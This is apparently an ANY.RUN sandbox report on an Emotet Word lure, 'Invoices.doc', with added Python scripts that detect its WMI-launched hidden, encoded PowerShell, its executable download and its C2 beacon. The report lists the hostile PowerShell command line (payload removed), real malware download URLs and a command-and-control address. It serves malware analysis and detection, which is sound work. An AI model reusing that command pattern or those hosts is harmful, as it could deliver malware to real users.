| Field | Value |
|---|---|
| File name | Invoices.doc |
| Full analysis | https://app.any.run/tasks/6fceaab8-8423-4c22-a591-f442c62a1e09 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it was upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | November 16, 2019, 21:28:37 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, OS: Windows, Version 6.1, Code page: 1252, Title: Sed et voluptatem., Author: Zoey Schott, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 15:41:00 2019, Last Saved Time/Date: Fri Nov 15 15:41:00 2019, Number of Pages: 1, Number of Words: 19, Number of Characters: 114, Security: 0 |
| MD5 | 0EC45367F7E3D89329F808FAE7436A38 |
| SHA1 | CC559A1A4FA9309D25B0C27DF77C842B4C663EDB |
| SHA256 | E367D90C466EF104ECB98B3A1D5D2FE59BB0ABD27583E67B52E974319B8A3805 |
| SSDEEP | 3072:bluOdH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/iIlaAEmvgkopTXITVL:bluOdHNaqrSzGdD48+aPOnfI5op0t |
File type identification

| Extension | Type | Match score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
Document metadata

| Field | Value |
|---|---|
| Title | Sed et voluptatem. |
| Subject | — |
| Author | Zoey Schott |
| Keywords | — |
| Comments | — |
| Template | Normal.dotm |
| LastModifiedBy | — |
| RevisionNumber | 1 |
| Software | Microsoft Office Word |
| TotalEditTime | — |
| CreateDate | 2019:11:15 15:41:00 |
| ModifyDate | 2019:11:15 15:41:00 |
| Pages | 1 |
| Words | 19 |
| Characters | 114 |
| Security | None |
| CodePage | Windows Latin 1 (Western European) |
| Company | — |
| Lines | 1 |
| Paragraphs | 1 |
| CharCountWithSpaces | 132 |
| AppVersion | 16 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | — |
| HeadingPairs | — |
| CompObjUserTypeLen | 25 |
| CompObjUserType | Microsoft Forms 2.0 Form |

Two of these fields matter for triage. Security is the document's protection flag (0 means no password, read-only or annotation lock), not a safety rating. CompObjUserType = Microsoft Forms 2.0 Form reveals an embedded MSForms UserForm, an object that only exists inside a VBA project, so the file carries macros even though this listing shows no VBA streams; the Word8.0\MSForms.exd file that WINWORD.EXE writes later in this report is the cached type library Word creates when it loads Forms 2.0 controls, which is consistent with that. Identical create and modify timestamps, revision 1, a lorem-ipsum title and a 19-word body are typical of a generated lure document.
Processes

| PID | Command line | Path | Parent process | Details |
|---|---|---|---|---|
| 2364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoices.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 4000 | powershell -w hidden -enco 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255); Exit code: 0 |
| 1560 | "C:\Users\admin\951.exe" | C:\Users\admin\951.exe | powershell.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 3824 | --e3b69773 | C:\Users\admin\951.exe | 951.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 3532 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | 951.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 1268 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | User: admin; Integrity level: MEDIUM |

Execution chain: Word opens the lure; PowerShell is started with a hidden window and an encoded command, and its parent is wmiprvse.exe rather than WINWORD.EXE, i.e. the macro launched it through WMI, which defeats a naive "Office parent of PowerShell" check. PowerShell downloads and runs C:\Users\admin\951.exe (see the file and HTTP tables below); 951.exe relaunches itself with the argument --e3b69773, installs a copy as C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe, and that copy relaunches itself with --d6864438. The final instance (PID 1268) has no exit code because it was still running at the end of the analysis; it is the one that beacons to the C2 server.
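The process table above is the chain a detection rule has to catch. The script below is an added example, not part of the ANY.RUN report, that replays that chain as constructed process-creation events and applies four rules to them. PIDs 2364, 4000, 1560, 3824, 3532 and 1268 and their images are the report's; the PIDs and parents for explorer.exe, svchost.exe and WmiPrvSE.exe, the full command lines of the relaunched instances, and the choice of PID 3824 as the parent of serialfunc.exe are assumptions, and the encoded command is a placeholder because the report redacts it. The point it demonstrates is that the classic "Office ancestor of PowerShell" lineage rule never fires here, because WMI breaks the tree; a rule keyed on WmiPrvSE.exe as the parent of a hidden, encoded PowerShell is what catches PID 4000.

```python
import re
import shlex
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_PROFILE = re.compile(r"(?i)^c:\\users\\[^\\]+\\")   # anything under a user profile
SELF_RELAUNCH = re.compile(r"^--[0-9a-f]{8}$")           # --e3b69773 / --d6864438 style seen here


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str    # full path of the executable
    cmdline: str  # command line as logged

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def args_of(p: Proc) -> list:
    """Arguments without the program token, whether or not the log stored that token."""
    toks = shlex.split(p.cmdline, posix=False)        # non-POSIX: keeps quoted paths whole
    if toks and p.name.startswith(toks[0].strip('"').rsplit("\\", 1)[-1].lower()):
        toks = toks[1:]
    return toks


def has_encoded_flag(cmdline: str) -> bool:
    """powershell.exe takes -e, -ec or any prefix of -EncodedCommand (the report shows -enco)."""
    for tok in shlex.split(cmdline, posix=False):
        body = tok[1:].lower() if tok.startswith("-") else ""
        if body and (body == "ec" or "encodedcommand".startswith(body)):
            return True
    return False


def has_hidden_window(cmdline: str) -> bool:
    """-w hidden, -win hidden, -WindowStyle Hidden: a prefix of -WindowStyle followed by 'hidden'."""
    toks = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(toks[:-1]):
        body = tok[1:].lower() if tok.startswith("-") else ""
        if body and "windowstyle".startswith(body) and toks[i + 1].lower() == "hidden":
            return True
    return False


def office_ancestor(p: Proc, by_pid: dict, max_depth: int = 5) -> bool:
    """Classic lineage rule: is an Office application among the ancestors?"""
    cur = by_pid.get(p.ppid)
    for _ in range(max_depth):
        if cur is None:
            return False
        if cur.name in OFFICE_APPS:
            return True
        cur = by_pid.get(cur.ppid)
    return False


def analyze(procs: list) -> list:
    """Return (rule, pid) findings in event order."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if p.name == "powershell.exe" and (has_encoded_flag(p.cmdline) or has_hidden_window(p.cmdline)):
            if office_ancestor(p, by_pid):
                findings.append(("office_spawns_powershell", p.pid))
            if parent is not None and parent.name == "wmiprvse.exe":
                findings.append(("wmi_spawns_powershell", p.pid))
        if (parent is not None and parent.name == "powershell.exe"
                and USER_PROFILE.match(p.image) and p.name.endswith(".exe")):
            findings.append(("powershell_runs_user_profile_exe", p.pid))
        args = args_of(p)
        if (parent is not None and parent.image.lower() == p.image.lower()
                and len(args) == 1 and SELF_RELAUNCH.match(args[0])):
            findings.append(("self_relaunch_hex_arg", p.pid))
    return findings


# Constructed from the report's process table. PIDs and images of the six listed processes are
# the report's; explorer/svchost/WmiPrvSE PIDs, full relaunch command lines and the parent of
# serialfunc.exe are assumed; the encoded command is a placeholder (the report redacts it).
SAMPLE_EVENTS = [
    Proc(1200, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(2364, 1200, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoices.doc"'),
    Proc(800, 0, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    Proc(900, 800, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    Proc(4000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -w hidden -enco <BASE64_PLACEHOLDER>"),
    Proc(1560, 4000, r"C:\Users\admin\951.exe", r'"C:\Users\admin\951.exe"'),
    Proc(3824, 1560, r"C:\Users\admin\951.exe", r'"C:\Users\admin\951.exe" --e3b69773'),
    Proc(3532, 3824, r"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe",
         r'"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"'),
    Proc(1268, 3532, r"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe",
         r'"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" --d6864438'),
]

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_EVENTS):
        print(f"{rule:36} pid={pid}")
```

Running it yields four findings: wmi_spawns_powershell for 4000, powershell_runs_user_profile_exe for 1560, and self_relaunch_hex_arg for 3824 and 1268; office_spawns_powershell never fires. The prefix matching in has_encoded_flag and has_hidden_window matters because PowerShell accepts any unambiguous abbreviation of its parameters, so a rule that looks only for the literal "-EncodedCommand" misses this sample.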
File activity

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA860.tmp.cvr | — | — | — |
| 4000 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MWQTL08VMD5NI8EKPWT1.temp | — | — | — |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61C24ED9.wmf | wmf | E861BBA1549CB72E2A4CDC2CCFA6E587 | 3CCC82E556CFB694A2BB26FC6DC850D57A8B4FB4613762F681013C08CE02B18E |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BFA551A.wmf | wmf | 8330E76EEF89CD22D483DBE91C04F7F1 | 928A1D977B2C932F516641819E361ACB294711C0E28DB2EFFB64BF8CFC0D9BC8 |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 1639E7A75CEB367F88D7CE1D2BC352B9 | FD221D24788CDB481D79724A46F8BD66BC052DEBF8529A91A3F422CC5497AB2E |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C4143D.wmf | wmf | B2650C5447C9D5B125EBFFE47214C115 | 206F500DC30B49A0F88A96F00EAAFAA14ABEF9A71D8F90AE7164B6F37D73D2D6 |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | C34C1DDD839C2A0232FC5E3F81A8AFDF | 9294C8C13A505FBABE20E846186AA03AD23D0A8728B641B98C23D2EBFCD8DC60 |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2928AE53.wmf | wmf | E79F510F46B60D762F9BEFCAE9B7561D | 043FCA7568FE3AE0C53F9BC7E60C981D15A6C3D73EE6D442DF97BC924EBD5780 |
| 2364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$voices.doc | pgc | 44221E796EEB3EF80DDDA3B2C6D9BF5D | F2CFAC825B02C8C85E76AECD662BA4DB6A28A99B70BD9328F674FE8265D61F6A |
| 4000 | powershell.exe | C:\Users\admin\951.exe | executable | D28403ECEA469B395C350E759BE69080 | 68FA7B153D1FEF8FA7FDBCE97316CDD5CACD6B4999923DC061EA5D6AE372D519 |
HTTP requests

| PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 4000 | powershell.exe | GET | — | 148.72.57.207:80 | http://digestyn7.com/cgi-bin/FWd9BR/ | US | — | — | suspicious |
| 4000 | powershell.exe | GET | 404 | 45.14.227.17:80 | http://cinemanews.info/wp-content/qSvpuqk/ | unknown | html | 12.2 KB | unknown |
| 4000 | powershell.exe | GET | 200 | 77.48.200.144:80 | http://www.kosmetikapribram.cz/@Recycle/SiubtRH1gz/ | CZ | executable | 240 KB | suspicious |
| 1268 | serialfunc.exe | POST | 200 | 65.23.154.17:8080 | http://65.23.154.17:8080/publish/ | US | binary | 148 B | malicious |
Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 4000 | powershell.exe | 77.48.200.144:80 | www.kosmetikapribram.cz | Liberty Global Operations B.V. | CZ | suspicious |
| 1268 | serialfunc.exe | 65.23.154.17:8080 | — | IO Capital Princess, LLC | US | malicious |
| 4000 | powershell.exe | 148.72.57.207:80 | digestyn7.com | — | US | suspicious |
| 4000 | powershell.exe | 45.14.227.17:80 | cinemanews.info | — | — | unknown |
DNS requests (IPs as resolved in the connections table)

| Domain | IP | Reputation |
|---|---|---|
| digestyn7.com | 148.72.57.207 | suspicious |
| cinemanews.info | 45.14.227.17 | unknown |
| www.kosmetikapribram.cz | 77.48.200.144 | suspicious |
Threats (Suricata alerts)

| PID | Process | Class | Message |
|---|---|---|---|
| 4000 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
| 4000 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
| 4000 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
| 1268 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
| 1268 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
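The HTTP, connection and alert tables together describe a download-then-beacon pattern: PowerShell walks a list of compromised sites until one returns a PE (the first host never answers, the second returns a 404 page, the third serves a 240 KB executable from a path with no file extension), and the installed copy then POSTs a small binary body to a bare IP on port 8080. The script below is an added example, not part of the ANY.RUN report, that applies that reasoning to HTTP records constructed from the tables above. Status codes, IPs and URLs are the report's; response headers and bodies are made up because the report does not show them, and the payload is replaced by a zero-padded MZ/PE header skeleton. The "minimal headers" check is a loose stand-in for the idea behind the ET INFO signature, not a reimplementation of that rule.

```python
import ipaddress
from urllib.parse import urlsplit


def is_pe(body: bytes) -> bool:
    """PE check by content, not by URL or Content-Type: 'MZ' stub and 'PE\\0\\0' at e_lfanew."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def fake_pe(size: int = 240 * 1024) -> bytes:
    """Constructed stand-in for the 240 KB payload: an MZ/PE header skeleton padded with zeros."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + (0x80).to_bytes(4, "little"))  # e_lfanew = 0x80
    hdr += b"\0" * (0x80 - len(hdr)) + b"PE\0\0"
    return bytes(hdr) + b"\0" * (size - len(hdr))


def host_is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


# Constructed from the report's HTTP table. pid, method, status, ip and url are the report's;
# headers and bodies are made up (the report does not show them).
RECORDS = [
    {"pid": 4000, "process": "powershell.exe", "method": "GET", "status": None,
     "ip": "148.72.57.207", "url": "http://digestyn7.com/cgi-bin/FWd9BR/",
     "headers": {}, "body": b""},
    {"pid": 4000, "process": "powershell.exe", "method": "GET", "status": 404,
     "ip": "45.14.227.17", "url": "http://cinemanews.info/wp-content/qSvpuqk/",
     "headers": {"Server": "nginx", "Content-Type": "text/html", "Content-Length": "12493"},
     "body": b"<html><body>404 Not Found</body></html>"},
    {"pid": 4000, "process": "powershell.exe", "method": "GET", "status": 200,
     "ip": "77.48.200.144", "url": "http://www.kosmetikapribram.cz/@Recycle/SiubtRH1gz/",
     "headers": {"Content-Type": "application/octet-stream", "Content-Length": "245760"},
     "body": fake_pe()},
    {"pid": 1268, "process": "serialfunc.exe", "method": "POST", "status": 200,
     "ip": "65.23.154.17", "url": "http://65.23.154.17:8080/publish/",
     "headers": {"Content-Type": "application/octet-stream", "Content-Length": "148"},
     "body": bytes(148)},
]


def triage(records: list) -> dict:
    """Flag downloader/beacon behaviour and collect network IOCs from HTTP records."""
    findings, gets_by_pid, domains, ips = [], {}, set(), set()
    for r in records:
        u = urlsplit(r["url"])
        host = u.hostname
        port = u.port or (443 if u.scheme == "https" else 80)
        ips.add(r["ip"])
        if not host_is_ip(host):
            domains.add(host)
        pe = r["method"] == "GET" and is_pe(r["body"])
        if pe:
            findings.append(("pe_download", r["pid"], r["url"]))
            # Loose stand-in for the "minimal HTTP headers" idea: a PE served with two or
            # fewer response headers (no Server, Date, Last-Modified, ...).
            if len(r["headers"]) <= 2:
                findings.append(("pe_with_minimal_headers", r["pid"], r["url"]))
        if r["method"] == "POST" and host_is_ip(host) and port not in (80, 443):
            findings.append(("post_to_raw_ip_nonstd_port", r["pid"], f"{host}:{port}"))
        if r["method"] == "GET":
            gets_by_pid.setdefault(r["pid"], []).append((host, pe))
    # Downloader fallback: one process walks several hosts and only the last one yields a PE.
    for pid, seq in gets_by_pid.items():
        hosts = {h for h, _ in seq}
        if len(hosts) >= 2 and seq[-1][1] and not any(pe for _, pe in seq[:-1]):
            findings.append(("fallback_download_chain", pid, len(hosts)))
    return {"findings": findings, "domains": sorted(domains), "ips": sorted(ips)}


if __name__ == "__main__":
    result = triage(RECORDS)
    for f in result["findings"]:
        print(*f)
    print("domains:", ", ".join(result["domains"]))
    print("ips:", ", ".join(result["ips"]))
```

The content check is deliberate: the payload URL ends in a directory-like path and the Type column in the report is derived from the body, so keying on the file extension or on the declared Content-Type would miss it. The "fallback" rule captures what the three GETs from PID 4000 show, a list of download sites tried in order until one responds with a PE, which is a stronger signal than any single failed request.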